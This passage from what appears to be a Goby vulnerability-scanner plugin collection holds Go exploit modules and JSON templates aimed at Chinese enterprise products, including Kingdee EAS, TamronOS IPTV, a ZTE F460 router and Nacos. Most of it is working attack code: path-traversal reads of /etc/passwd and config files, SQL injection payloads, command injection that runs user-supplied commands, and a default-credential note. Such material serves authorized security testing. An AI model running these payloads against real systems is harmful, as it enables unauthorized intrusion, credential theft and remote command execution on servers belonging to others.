", 25 | "Recommendation": "Update", 26 | "References": [ 27 | "http://wiki.peiqi.tech" 28 | ], 29 | "HasExp": true, 30 | "ExpParams": [ 31 | { 32 | "name": "File", 33 | "type": "input", 34 | "value": "/c6/web.config" 35 | } 36 | ], 37 | "ScanSteps": [ 38 | "AND" 39 | ], 40 | "ExploitSteps": null, 41 | "Tags": [ 42 | "File read" 43 | ], 44 | "CVEIDs": null, 45 | "CVSSScore": "0.0", 46 | "AttackSurfaces": { 47 | "Application": [ 48 | "JingHe OA" 49 | ], 50 | "Support": null, 51 | "Service": null, 52 | "System": null, 53 | "Hardware": null 54 | }, 55 | "Recommandation": "undefined
" 56 | }` 57 | 58 | ExpManager.AddExploit(NewExploit( 59 | goutils.GetFileName(), 60 | expJson, 61 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 62 | uri := "/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config" 63 | cfg := httpclient.NewGetRequestConfig(uri) 64 | cfg.VerifyTls = false 65 | cfg.FollowRedirect = false 66 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 67 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 68 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "configuration") 69 | } 70 | return false 71 | }, 72 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 73 | file := ss.Params["File"].(string) 74 | uri := "/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=" + file 75 | cfg := httpclient.NewGetRequestConfig(uri) 76 | cfg.VerifyTls = false 77 | cfg.FollowRedirect = false 78 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 79 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 80 | if resp.StatusCode == 200 { 81 | expResult.Output = resp.RawBody 82 | expResult.Success = true 83 | } 84 | } 85 | return expResult 86 | }, 87 | )) 88 | } -------------------------------------------------------------------------------- /go/Kingdee_EAS_server_file_Directory_traversal.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "Kingdee EAS server_file Directory traversal", 16 | "Description": "Kingdee EAS server file Directory traversal,The attacker can obtain the sensitive information of the server through 
directory traversal", 17 | "Product": "Kingdee EAS", 18 | "Homepage": "https://www.kingdee.com/", 19 | "DisclosureDate": "2021-06-03", 20 | "Author": "PeiQi", 21 | "GobyQuery": "app=\"kingdee-EAS\"", 22 | "Level": "1", 23 | "Impact": "Directory traversal
", 24 | "Recommendation": "", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": true, 29 | "ExpParams": [ 30 | { 31 | "name": "Dir", 32 | "type": "input", 33 | "value": "/" 34 | } 35 | ], 36 | "ExpTips": { 37 | "Type": "", 38 | "Content": "" 39 | }, 40 | "ScanSteps": [ 41 | "AND" 42 | ], 43 | "ExploitSteps": null, 44 | "Tags": [ 45 | "Directory traversal" 46 | ], 47 | "CVEIDs": null, 48 | "CVSSScore": "0.0", 49 | "AttackSurfaces": { 50 | "Application": [ 51 | "Kingdee EAS" 52 | ], 53 | "Support": null, 54 | "Service": null, 55 | "System": null, 56 | "Hardware": null 57 | }, 58 | "Recommandation": "undefined
" 59 | }` 60 | 61 | ExpManager.AddExploit(NewExploit( 62 | goutils.GetFileName(), 63 | expJson, 64 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 65 | uri := "/appmonitor/protected/selector/server_file/files?folder=/&suffix=" 66 | cfg := httpclient.NewGetRequestConfig(uri) 67 | cfg.VerifyTls = false 68 | cfg.FollowRedirect = false 69 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 70 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 71 | return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "folder") 72 | } 73 | return false 74 | }, 75 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 76 | dir := ss.Params["Dir"].(string) 77 | uri := "/appmonitor/protected/selector/server_file/files?folder=" + dir + "&suffix=" 78 | cfg := httpclient.NewGetRequestConfig(uri) 79 | cfg.VerifyTls = false 80 | cfg.FollowRedirect = false 81 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 82 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 83 | re := regexp.MustCompile(`"path":"(.*?)"`).FindAllString(resp.RawBody, -1) 84 | data := "" 85 | for _, path := range re { 86 | data += path + "\r\n" 87 | } 88 | expResult.Output = data 89 | expResult.Success = true 90 | } 91 | return expResult 92 | }, 93 | )) 94 | } 95 | -------------------------------------------------------------------------------- /go/Qilai_OA_CloseMsg.aspx_SQL_injection.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | ) 11 | 12 | func init() { 13 | expJson := `{ 14 | "Name": "Qilai OA CloseMsg.aspx SQL injection", 15 | "Description": "Qilai OA CloseMsg.aspx SQL 
injection", 16 | "Product": "Qilai OA", 17 | "Homepage": "https://qioa.company.xuanruanjian.com/", 18 | "DisclosureDate": "2021-05-18", 19 | "Author": "PeiQi", 20 | "GobyQuery": "app=\"qiOA\"", 21 | "Level": "2", 22 | "Impact": "SQL injection", 23 | "Recommendation": "", 24 | "References": [ 25 | "http://wiki.peiqi.tech" 26 | ], 27 | "HasExp": false, 28 | "ExpParams": null, 29 | "ExpTips": { 30 | "Type": "", 31 | "Content": "" 32 | }, 33 | "ScanSteps": [ 34 | "AND", 35 | { 36 | "Request": { 37 | "data": "", 38 | "data_type": "text", 39 | "follow_redirect": true, 40 | "method": "GET", 41 | "uri": "/" 42 | }, 43 | "ResponseTest": { 44 | "checks": [ 45 | { 46 | "bz": "", 47 | "operation": "==", 48 | "type": "item", 49 | "value": "200", 50 | "variable": "$code" 51 | } 52 | ], 53 | "operation": "AND", 54 | "type": "group" 55 | } 56 | } 57 | ], 58 | "ExploitSteps": null, 59 | "Tags": ["SQL injection"], 60 | "CVEIDs": null, 61 | "CVSSScore": "0.0", 62 | "AttackSurfaces": { 63 | "Application": ["qiOA"], 64 | "Support": null, 65 | "Service": null, 66 | "System": null, 67 | "Hardware": null 68 | } 69 | }` 70 | 71 | ExpManager.AddExploit(NewExploit( 72 | goutils.GetFileName(), 73 | expJson, 74 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 75 | uri := "/client/CloseMsg.aspx?user='&pwd=1" 76 | cfg := httpclient.NewGetRequestConfig(uri) 77 | cfg.VerifyTls = false 78 | cfg.FollowRedirect = false 79 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 80 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 81 | return resp.StatusCode == 500 && strings.Contains(resp.Utf8Html, "C4CA4238A0B923820DCC509A6F75849B") 82 | } 83 | return false 84 | }, 85 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 86 | return expResult 87 | }, 88 | )) 89 | } -------------------------------------------------------------------------------- 
/go/ShiziyuCms_ApiController.class.php_SQL_injection.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "ShiziyuCms ApiController.class.php SQL injection", 16 | "Description": "ShiziyuCms ApiController.class.php SQL injection", 17 | "Product": "ShiziyuCms", 18 | "Homepage": "https://www.tyha.cn/", 19 | "DisclosureDate": "2021-05-18", 20 | "Author": "PeiQi", 21 | "GobyQuery": "body=\"/seller.php?s=/Public/login\"", 22 | "Level": "2", 23 | "Impact": "SQL injection", 24 | "Recommendation": "", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": false, 29 | "ExpParams": null, 30 | "ExpTips": { 31 | "Type": "", 32 | "Content": "" 33 | }, 34 | "ScanSteps": [ 35 | "AND", 36 | { 37 | "Request": { 38 | "data": "", 39 | "data_type": "text", 40 | "follow_redirect": true, 41 | "method": "GET", 42 | "uri": "/" 43 | }, 44 | "ResponseTest": { 45 | "checks": [ 46 | { 47 | "bz": "", 48 | "operation": "==", 49 | "type": "item", 50 | "value": "200", 51 | "variable": "$code" 52 | } 53 | ], 54 | "operation": "AND", 55 | "type": "group" 56 | } 57 | } 58 | ], 59 | "ExploitSteps": null, 60 | "Tags": ["SQL injection"], 61 | "CVEIDs": null, 62 | "CVSSScore": "0.0", 63 | "AttackSurfaces": { 64 | "Application": ["ShiziyuCms"], 65 | "Support": null, 66 | "Service": null, 67 | "System": null, 68 | "Hardware": null 69 | } 70 | }` 71 | 72 | ExpManager.AddExploit(NewExploit( 73 | goutils.GetFileName(), 74 | expJson, 75 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 76 | uri := "/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)" 77 | cfg := 
httpclient.NewGetRequestConfig(uri) 78 | cfg.VerifyTls = false 79 | cfg.FollowRedirect = false 80 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 81 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 82 | return strings.Contains(resp.RawBody, "c4ca4238a0b923820dcc509a6f75849") 83 | } 84 | return false 85 | }, 86 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 87 | return expResult 88 | }, 89 | )) 90 | } -------------------------------------------------------------------------------- /go/ShiziyuCms_ApigoodsController.class.php_SQL_injection.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "ShiziyuCms ApigoodsController.class.php SQL injection", 16 | "Description": "ShiziyuCms ApigoodsController.class.php SQL injection", 17 | "Product": "ShiziyuCms", 18 | "Homepage": "https://www.tyha.cn/", 19 | "DisclosureDate": "2021-05-18", 20 | "Author": "PeiQi", 21 | "GobyQuery": "body=\"/seller.php?s=/Public/login\"", 22 | "Level": "2", 23 | "Impact": "SQL injection", 24 | "Recommendation": "", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": false, 29 | "ExpParams": null, 30 | "ExpTips": { 31 | "Type": "", 32 | "Content": "" 33 | }, 34 | "ScanSteps": [ 35 | "AND", 36 | { 37 | "Request": { 38 | "data": "", 39 | "data_type": "text", 40 | "follow_redirect": true, 41 | "method": "GET", 42 | "uri": "/" 43 | }, 44 | "ResponseTest": { 45 | "checks": [ 46 | { 47 | "bz": "", 48 | "operation": "==", 49 | "type": "item", 50 | "value": "200", 51 | "variable": "$code" 52 | } 53 | ], 54 | "operation": "AND", 55 | "type": "group" 56 | } 57 
| } 58 | ], 59 | "ExploitSteps": null, 60 | "Tags": ["SQL injection"], 61 | "CVEIDs": null, 62 | "CVSSScore": "0.0", 63 | "AttackSurfaces": { 64 | "Application": ["ShiziyuCms"], 65 | "Support": null, 66 | "Service": null, 67 | "System": null, 68 | "Hardware": null 69 | } 70 | }` 71 | 72 | ExpManager.AddExploit(NewExploit( 73 | goutils.GetFileName(), 74 | expJson, 75 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 76 | uri := "/index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)" 77 | cfg := httpclient.NewGetRequestConfig(uri) 78 | cfg.VerifyTls = false 79 | cfg.FollowRedirect = false 80 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 81 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 82 | return strings.Contains(resp.RawBody, "c4ca4238a0b923820dcc509a6f75849") 83 | } 84 | return false 85 | }, 86 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 87 | return expResult 88 | }, 89 | )) 90 | } -------------------------------------------------------------------------------- /go/TamronOS_IPTV_ping_RCE.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "TamronOS IPTV ping RCE", 16 | "Description": "There is an arbitrary command execution vulnerability in the api/ping of tamronos IPTV system, through which attackers can execute arbitrary commands", 17 | "Product": "TamronOS IPTV", 18 | "Homepage": "http://www.tamronos.com/", 19 | "DisclosureDate": "2021-06-15", 20 | "Author": "PeiQi", 21 | "GobyQuery": "title=\"TamronOS IPTV系统\"", 22 | "Level": "3", 23 | "Impact": 
"RCE
", 24 | "Recommendation": "Update", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": true, 29 | "ExpParams": [ 30 | { 31 | "name": "Cmd", 32 | "type": "input", 33 | "value": "id" 34 | } 35 | ], 36 | "ScanSteps": [ 37 | "AND" 38 | ], 39 | "ExploitSteps": null, 40 | "Tags": [ 41 | "RCE" 42 | ], 43 | "CVEIDs": null, 44 | "CVSSScore": "0.0", 45 | "AttackSurfaces": { 46 | "Application": [ 47 | "TamronOS IPTV" 48 | ], 49 | "Support": null, 50 | "Service": null, 51 | "System": null, 52 | "Hardware": null 53 | }, 54 | "Recommandation": "undefined
" 55 | }` 56 | 57 | ExpManager.AddExploit(NewExploit( 58 | goutils.GetFileName(), 59 | expJson, 60 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 61 | uri := "/api/ping?count=5&host=;id;" 62 | cfg := httpclient.NewGetRequestConfig(uri) 63 | cfg.VerifyTls = false 64 | cfg.FollowRedirect = false 65 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 66 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 67 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "uid=") 68 | } 69 | return false 70 | }, 71 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 72 | cmd := ss.Params["Cmd"].(string) 73 | cmd = strings.Replace(cmd, " ", "%20", -1) 74 | uri := "/api/ping?count=5&host=;" + cmd + ";" 75 | cfg := httpclient.NewGetRequestConfig(uri) 76 | cfg.VerifyTls = false 77 | cfg.FollowRedirect = false 78 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 79 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 80 | if resp.StatusCode == 200 { 81 | re := regexp.MustCompile(`"result":"(.*?)"`).FindStringSubmatch(resp.RawBody)[1] 82 | expResult.Output = re 83 | expResult.Success = true 84 | } 85 | } 86 | return expResult 87 | }, 88 | )) 89 | } 90 | 91 | -------------------------------------------------------------------------------- /go/ZhongkeWangwei_Next_generation_firewall_File_read.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "regexp" 10 | "strings" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "ZhongkeWangwei Next generation firewall File read", 16 | "Description": "ZhongkeWangwei Next generation firewall File read, 
There is an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information", 17 | "Product": "ZhongkeWangwei Next generation firewall", 18 | "Homepage": "http://www.netpower.com.cn/", 19 | "DisclosureDate": "2021-06-02", 20 | "Author": "PeiQi", 21 | "GobyQuery": "body=\"Get_Verify_Info(hex_md5(user_string).\"", 22 | "Level": "2", 23 | "Impact": "File read
", 24 | "Recommendation": "", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": true, 29 | "ExpParams": [ 30 | { 31 | "name": "File", 32 | "type": "input", 33 | "value": "/etc/passwd" 34 | } 35 | ], 36 | "ScanSteps": [ 37 | "AND" 38 | ], 39 | "ExploitSteps": null, 40 | "Tags": [ 41 | "File Read" 42 | ], 43 | "CVEIDs": null, 44 | "CVSSScore": "0.0", 45 | "AttackSurfaces": { 46 | "Application": [ 47 | "ZhongkeWangwei Next generation firewall" 48 | ], 49 | "Support": null, 50 | "Service": null, 51 | "System": null, 52 | "Hardware": null 53 | }, 54 | "Recommandation": "update
" 55 | }` 56 | 57 | ExpManager.AddExploit(NewExploit( 58 | goutils.GetFileName(), 59 | expJson, 60 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 61 | uri := "/download.php?&class=vpn&toolname=../../../../../../../../etc/passwd" 62 | cfg := httpclient.NewPostRequestConfig(uri) 63 | cfg.VerifyTls = false 64 | cfg.FollowRedirect = false 65 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 66 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 67 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "root") 68 | } 69 | return false 70 | }, 71 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 72 | file := ss.Params["File"].(string) 73 | uri := "/download.php?&class=vpn&toolname=../../../../../../../.." + file 74 | cfg := httpclient.NewPostRequestConfig(uri) 75 | cfg.VerifyTls = false 76 | cfg.FollowRedirect = false 77 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 78 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 79 | if resp.StatusCode == 200 { 80 | expResult.Output = resp.Utf8Html 81 | expResult.Success = true 82 | } 83 | } 84 | return expResult 85 | }, 86 | )) 87 | } 88 | -------------------------------------------------------------------------------- /go/Zhongxing_F460_web_shell_cmd.gch_RCE.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | ) 11 | 12 | func init() { 13 | expJson := `{ 14 | "Name": "Zhongxing F460 web_shell_cmd.gch RCE", 15 | "Description": "Zhongxing F460 web_shell_cmd.gch RCE", 16 | "Product": "Zhongxing F460", 17 | "Homepage": "https://www.zte.com.cn/", 18 | "DisclosureDate": 
"2021-05-18", 19 | "Author": "PeiQi", 20 | "GobyQuery": "app=\"ZTE-ZXA10F460\"", 21 | "Level": "3", 22 | "Impact": "RCE", 23 | "Recommendation": "", 24 | "References": [ 25 | "http://wiki.peiqi.tech" 26 | ], 27 | "HasExp": false, 28 | "ExpParams": null, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "data": "", 34 | "data_type": "text", 35 | "follow_redirect": true, 36 | "method": "GET", 37 | "uri": "/" 38 | }, 39 | "ResponseTest": { 40 | "checks": [ 41 | { 42 | "bz": "", 43 | "operation": "==", 44 | "type": "item", 45 | "value": "200", 46 | "variable": "$code" 47 | } 48 | ], 49 | "operation": "AND", 50 | "type": "group" 51 | } 52 | } 53 | ], 54 | "ExploitSteps": null, 55 | "Tags": ["RCE"], 56 | "CVEIDs": null, 57 | "CVSSScore": "0.0", 58 | "AttackSurfaces": { 59 | "Application": ["WangKang Next generation firewall"], 60 | "Support": null, 61 | "Service": null, 62 | "System": null, 63 | "Hardware": null 64 | } 65 | }` 66 | 67 | ExpManager.AddExploit(NewExploit( 68 | goutils.GetFileName(), 69 | expJson, 70 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 71 | uri := "/web_shell_cmd.gch" 72 | cfg := httpclient.NewPostRequestConfig(uri) 73 | cfg.VerifyTls = false 74 | cfg.FollowRedirect = false 75 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 76 | cfg.Data = "IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=ls&CmdAck=" 77 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 78 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "root") 79 | } 80 | return false 81 | }, 82 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 83 | return expResult 84 | }, 85 | )) 86 | } -------------------------------------------------------------------------------- /go/nsoft_EWEBS_casmain.xgi_File_read.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 
| import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "nsoft-EWEBS casmain.xgi File read", 16 | "Description": "nsoft EWEBS casmain.xgi File read, can read any file server", 17 | "Product": "nsoft EWEBS", 18 | "Homepage": "http://www.n-soft.com.cn/", 19 | "DisclosureDate": "2021-06-15", 20 | "Author": "PeiQi", 21 | "GobyQuery": "app=\"nsoft-EWEBS\"", 22 | "Level": "2", 23 | "Impact": "File read
", 24 | "Recommendation": "Update", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": true, 29 | "ExpParams": [ 30 | { 31 | "name": "File", 32 | "type": "input", 33 | "value": "../../Data/CONFIG/CasDbCnn.dat" 34 | } 35 | ], 36 | "ScanSteps": [ 37 | "AND" 38 | ], 39 | "ExploitSteps": null, 40 | "Tags": [ 41 | "File read" 42 | ], 43 | "CVEIDs": null, 44 | "CVSSScore": "0.0", 45 | "AttackSurfaces": { 46 | "Application": [ 47 | "nsoft EWEBS" 48 | ], 49 | "Support": null, 50 | "Service": null, 51 | "System": null, 52 | "Hardware": null 53 | }, 54 | "Recommandation": "undefined
" 55 | }` 56 | 57 | ExpManager.AddExploit(NewExploit( 58 | goutils.GetFileName(), 59 | expJson, 60 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 61 | uri := "/casmain.xgi" 62 | cfg := httpclient.NewPostRequestConfig(uri) 63 | cfg.VerifyTls = false 64 | cfg.FollowRedirect = false 65 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 66 | cfg.Data = "Language_S=../../../../../../../windows/win.ini" 67 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 68 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "for 16-bit app support") 69 | } 70 | return false 71 | }, 72 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 73 | file := ss.Params["File"].(string) 74 | uri := "/casmain.xgi" 75 | cfg := httpclient.NewPostRequestConfig(uri) 76 | cfg.VerifyTls = false 77 | cfg.FollowRedirect = false 78 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 79 | cfg.Data = "Language_S=../../../../../../../windows/win.ini" 80 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 81 | if resp.StatusCode == 200 { 82 | expResult.Output = resp.RawBody 83 | expResult.Success = true 84 | } 85 | } 86 | return expResult 87 | }, 88 | )) 89 | } 90 | 91 | -------------------------------------------------------------------------------- /json/360_TianQing_ccid_SQL_injectable.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "360 TianQing ccid SQL injectable", 3 | "Level": "2", 4 | "Tags": [], 5 | "GobyQuery": "app=\"360-TianQing\"", 6 | "Description": "The attacker can get the server permission by injecting SQL into the upload Trojan", 7 | "Product": "360 TianQing", 8 | "Homepage": "htp://360.cn", 9 | "Author": "PeiQi", 10 | "Impact": "The attacker can get the server permission by injecting SQL into the upload Trojan
undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/api/dbstat/gettablessize", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "schema_name", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "table_name", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "table_size", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [] 63 | } 64 | ], 65 | "PostTime": "2021-04-08 16:04:28", 66 | "GobyVersion": "1.8.255" 67 | } -------------------------------------------------------------------------------- /json/ADSelfService_Plus_RCE_CVE_2021_40539.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ADSelfService Plus RCE CVE-2021-40539", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce", 6 | "unauth" 7 | ], 8 | "GobyQuery": "(title=\"ManageEngine - ADSelfService Plus\" | app=\"ZOHO-ManageEngine-ADSelfService\" | title==\"ADSelfService Plus\" | body=\"ADSelfService Plus\")", 9 | "Description": "Zoho ManageEngine ADSelfService Plus 6113版本及更早版本存在授权问题漏洞,该漏洞源于软件很容易绕过REST API认证,从而导致远程代码执行", 10 | "Product": "ADSelfService Plus", 11 | "Homepage": "https://www.manageengine.cn/products/self-service-password/pricing-details.html", 12 | "Author": "aetkrad", 13 | "Impact": "", 14 | "Recommendation": "", 15 | "References": [ 16 | "https://forum.butian.net/share/876" 17 | ], 18 | "HasExp": false, 19 | "ExpParams": null, 20 | "ExpTips": { 21 | "Type": 
"", 22 | "Content": "" 23 | }, 24 | "ScanSteps": [ 25 | "AND", 26 | { 27 | "Request": { 28 | "method": "POST", 29 | "uri": "/./RestAPI/LogonCustomization", 30 | "follow_redirect": false, 31 | "header": { 32 | "Content-Type": "application/x-www-form-urlencoded" 33 | }, 34 | "data_type": "text", 35 | "data": "methodToCall=previewMobLogo", 36 | "set_variable": [] 37 | }, 38 | "ResponseTest": { 39 | "type": "group", 40 | "operation": "AND", 41 | "checks": [ 42 | { 43 | "type": "item", 44 | "variable": "$code", 45 | "operation": "==", 46 | "value": "200", 47 | "bz": "" 48 | }, 49 | { 50 | "type": "item", 51 | "variable": "$body", 52 | "operation": "contains", 53 | "value": "var d = new Date();", 54 | "bz": "" 55 | }, 56 | { 57 | "type": "item", 58 | "variable": "$body", 59 | "operation": "contains", 60 | "value": "window.parent.$(\"#tabLogo\")", 61 | "bz": "" 62 | } 63 | ] 64 | }, 65 | "SetVariable": [ 66 | "output|lastbody|regex|" 67 | ] 68 | } 69 | ], 70 | "PostTime": "2021-11-30 20:01:22", 71 | "GobyVersion": "1.9.310" 72 | } -------------------------------------------------------------------------------- /json/Alibaba Nacos 控制台默认弱口令.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Alibaba Nacos 控制台默认弱口令", 3 | "Level": "2", 4 | "Tags": [ 5 | "弱口令" 6 | ], 7 | "GobyQuery": "(title=\"Nacos\" || title=\"HTTP Status 404 – Not Found\" || port=\"8848\") ", 8 | "Description": "Alibaba Nacos 控制台存在默认弱口令 nacos/nacos,可登录后台查看敏感信息", 9 | "Product": "Alibaba Nacos", 10 | "Homepage": "https://github.com/alibaba/nacos", 11 | "Author": "PeiQi", 12 | "Impact": "🐏
", 13 | "Recommandation": "undefined
